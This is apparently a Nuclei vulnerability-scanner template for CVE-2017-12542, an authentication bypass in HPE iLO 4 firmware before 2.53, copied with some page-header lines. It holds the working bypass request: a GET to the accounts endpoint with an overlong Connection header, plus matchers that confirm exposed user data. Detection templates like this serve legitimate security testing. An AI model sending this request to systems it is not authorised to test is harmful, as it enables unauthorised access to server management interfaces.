44 lines
1.1 KiB
YAML
44 lines
1.1 KiB
YAML
id: CVE-2017-12542
|
|
|
|
info:
|
|
name: HPE Integrated Lights-out 4 (ILO4) <2.53 - Authentication Bypass
|
|
author: pikpikcu
|
|
severity: critical
|
|
description: HPE Integrated Lights-out 4 (iLO 4) prior to 2.53 was found to contain an authentication bypass and code execution vulnerability.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/44005
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2017-12542
|
|
- https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03769en_us
|
|
- https://www.exploit-db.com/exploits/44005/
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
|
cvss-score: 10
|
|
cve-id: CVE-2017-12542
|
|
tags: ilo4,hpe,auth-bypass,edb,cve,cve2017
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/rest/v1/AccountService/Accounts"
|
|
|
|
headers:
|
|
Connection: AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "iLO User"
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "application/json"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# Enhanced by mp on 2022/05/11
|